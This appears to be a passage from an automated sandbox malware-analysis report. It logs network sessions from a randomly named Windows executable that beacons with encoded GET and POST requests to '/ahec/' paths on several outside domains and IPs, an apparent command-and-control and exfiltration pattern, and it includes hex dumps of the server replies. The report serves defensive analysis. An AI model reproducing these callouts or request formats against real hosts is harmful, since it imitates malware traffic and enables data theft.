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
                                                                                                                                                            Dec 8, 2023 14:52:52.827841043 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:52 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            40192.168.2.449780162.241.252.161805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:55.335270882 CET477OUTGET /ahec/?XveXHZvx=nB1qtJANgieev8TKH3dNfv3ofOkziUaCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMTKbCYScmVHGO9lg==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.thecoloringbitch.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:52:55.547863960 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:55 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            41192.168.2.449781185.74.252.11805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:01.509511948 CET744OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.altralogos.com
                                                                                                                                                            Origin: http://www.altralogos.com
                                                                                                                                                            Referer: http://www.altralogos.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6d 5a 56 74 71 68 6f 6a 63 53 2f 70 46 51 4e 64 2b 65 70 6a 5a 5a 77 67 4e 41 36 6c 57 77 45 6d 6d 32 4c 39 4d 44 46 6a 73 4a 33 57 4f 6f 6e 54 6c 41 47 38 51 64 52 4e 53 47 2b 6e 38 30 4f 31 4c 58 69 66 38 77 79 51 51 4b 54 76 4b 4e 57 76 57 58 39 59 61 71 58 4c 6b 37 55 77 6a 4c 62 66 6c 67 6b 39 37 51 36 38 64 35 45 38 4c 6c 33 34 46 46 46 51 68 76 64 49 30 72 4b 5a 76 6c 51 6c 58 4f 5a 4d 37 48 58 36 70 72 35 51 61 71 76 41 61 44 6d 76 31 47 6d 70 76 53 70 66 72 4f 33 6c 72 76 47 66 58 51 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=6nAY1pwJurF3mZVtqhojcS/pFQNd+epjZZwgNA6lWwEmm2L9MDFjsJ3WOonTlAG8QdRNSG+n80O1LXif8wyQQKTvKNWvWX9YaqXLk7UwjLbflgk97Q68d5E8Ll34FFFQhvdI0rKZvlQlXOZM7HX6pr5QaqvAaDmv1GmpvSpfrO3lrvGfXQ==
                                                                                                                                                            Dec 8, 2023 14:53:02.853344917 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:01 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Powered-By: PHP/7.4.33
                                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                            Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4d 53 49 6e 70 75 74 4d 65 74 68 6f 64 43 6f 6e 74 65 78 74 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 6a 73 2f 6c 69 62 73 2f 69 65 31 31 43 75 73 74 6f 6d 50 72 6f 70 65 72 74 69 65 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 50 72 65 6d 69 75 6d 20 70 6c 75 67 69 6e 20 76 31 39 2e 32 2e 31 20 28 59 6f 61 73 74 20 53 45 4f 20 76 31 39 2e 36 2e 31 29 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 20 7c 20 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 72 61 6c 6f 67 6f 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22
                                                                                                                                                            Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                                                                                                            Dec 8, 2023 14:53:02.853411913 CET1286INData Raw: 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f
                                                                                                                                                            Data Ascii: @context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://altralogos.com/#website","url":"https://altralogos.com/","name":"Altralogos","description":"Altralogos","potentialAction":[{"@type":"SearchAction","target":{"@type":"En
                                                                                                                                                            Dec 8, 2023 14:53:02.853451967 CET1286INData Raw: 2e 31 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a
                                                                                                                                                            Data Ascii: .125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><link rel='stylesheet' id='elementor-icons-css' href='http://altralogos.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
                                                                                                                                                            Dec 8, 2023 14:53:02.853491068 CET1286INData Raw: 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 62 61 73 65 2d 64 65 70 72 65 63 61 74 65 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c
                                                                                                                                                            Data Ascii: media='all' /><link rel='stylesheet' id='wd-base-deprecated-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/base-deprecated.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-elementor-base-
                                                                                                                                                            Dec 8, 2023 14:53:02.853528023 CET1286INData Raw: 27 20 69 64 3d 27 77 64 2d 70 61 67 65 2d 74 69 74 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73
                                                                                                                                                            Data Ascii: ' id='wd-page-title-css' href='http://altralogos.com/wp-content/themes/woodmart/css/parts/page-title.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-wd-search-form-css' href='http://altralogos.com/wp-content/the
                                                                                                                                                            Dec 8, 2023 14:53:02.853564024 CET1286INData Raw: 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 6f 70 74 2d 73 63 72 6f 6c 6c 74 6f 74 6f 70 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 35 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63
                                                                                                                                                            Data Ascii: -content/themes/woodmart/css/parts/opt-scrolltotop.min.css?ver=6.5.4' type='text/css' media='all' /><link rel='stylesheet' id='xts-google-fonts-css' href='https://fonts.googleapis.com/css?family=Inter%3A400%2C600%2C300%7CPlayfair+Display%3A40
                                                                                                                                                            Dec 8, 2023 14:53:02.853600979 CET1286INData Raw: 49 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 72 61 6c 6f 67 6f 73 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 3f
                                                                                                                                                            Data Ascii: I" type="application/rsd+xml" title="RSD" href="https://altralogos.com/xmlrpc.php?rsd" /><meta name="generator" content="WordPress 6.4.2" /><meta name="theme-color" content="rgb(1,34,31)"><meta name="viewport" content="width=device-widt
                                                                                                                                                            Dec 8, 2023 14:53:02.853637934 CET1286INData Raw: 70 3a 20 2d 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 2d 30 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2b 20 30 70 78 29 3b 0a 7d 0a 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31
                                                                                                                                                            Data Ascii: p: -0px;margin-bottom: -0px;height: calc(100% + 0px);}@media (min-width: 1025px) {.whb-top-bar-inner {height: 80px;max-height: 80px;}.whb-sticked .whb-top-bar-inner {height: 40px;max-height: 40px;}.whb-he
                                                                                                                                                            Dec 8, 2023 14:53:02.853673935 CET1286INData Raw: 6c 61 79 22 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 0a 2d 2d 77 64 2d 74 69 74 6c 65 2d 63 6f 6c 6f 72 3a 23
                                                                                                                                                            Data Ascii: lay", Arial, Helvetica, sans-serif;--wd-title-font-weight:600;--wd-title-color:#242424;}:root{--wd-entities-title-font:"Playfair Display", Arial, Helvetica, sans-serif;--wd-entities-title-font-weight:700;--wd-entities-title-color:#33333
                                                                                                                                                            Dec 8, 2023 14:53:02.853712082 CET1286INData Raw: 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 73 75 63 63 65 73 73 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 7d 0a 3a 72 6f 6f 74 7b 0a 2d 2d 6e 6f 74 69 63 65 73 2d 77 61 72 6e 69 6e 67 2d 62 67 3a 72 67 62 28 32 32 35 2c 31 31 33 2c 36 35 29 3b 0a 7d 0a
                                                                                                                                                            Data Ascii: t{--notices-success-color:#fff;}:root{--notices-warning-bg:rgb(225,113,65);}:root{--notices-warning-color:#fff;}:root{--wd-form-brd-radius: 35px;--wd-form-brd-width: 2px;--btn-default-color: #ff
                                                                                                                                                            Dec 8, 2023 14:53:03.093631983 CET1286INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                                                                                                            Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            42192.168.2.449782185.74.252.11805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:53:05.118521929 CET764OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.altralogos.com
                                                                                                                                                            Origin: http://www.altralogos.com
                                                                                                                                                            Referer: http://www.altralogos.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 36 6e 41 59 31 70 77 4a 75 72 46 33 6c 34 6c 74 73 47 30 6a 65 79 2f 32 5a 41 4e 64 6e 75 70 76 5a 5a 38 67 4e 43 57 31 57 44 67 6d 6d 54 76 39 4e 47 6c 6a 72 4a 33 57 47 49 6e 73 34 51 48 77 51 64 74 2f 53 45 71 6e 38 30 79 31 4c 57 53 66 39 42 79 50 54 36 54 70 41 64 57 74 4a 6e 39 59 61 71 58 4c 6b 37 70 62 6a 4c 44 66 6c 78 55 39 70 46 47 2f 62 4a 45 2f 43 46 33 34 55 56 46 4d 68 76 64 6d 30 71 58 32 76 6d 34 6c 58 50 70 4d 37 54 37 39 6a 72 34 62 48 61 76 4f 53 68 6a 37 2f 6b 37 34 73 43 46 71 6b 4f 47 5a 6a 61 71 4d 51 67 44 45 67 61 6a 39 42 42 67 59 44 4c 44 43 4d 34 51 5a 42 72 41 3d
                                                                                                                                                            Data Ascii: XveXHZvx=6nAY1pwJurF3l4ltsG0jey/2ZANdnupvZZ8gNCW1WDgmmTv9NGljrJ3WGIns4QHwQdt/SEqn80y1LWSf9ByPT6TpAdWtJn9YaqXLk7pbjLDflxU9pFG/bJE/CF34UVFMhvdm0qX2vm4lXPpM7T79jr4bHavOShj7/k74sCFqkOGZjaqMQgDEgaj9BBgYDLDCM4QZBrA=
                                                                                                                                                            Dec 8, 2023 14:53:06.360938072 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:05 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            X-Powered-By: PHP/7.4.33
                                                                                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                            Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
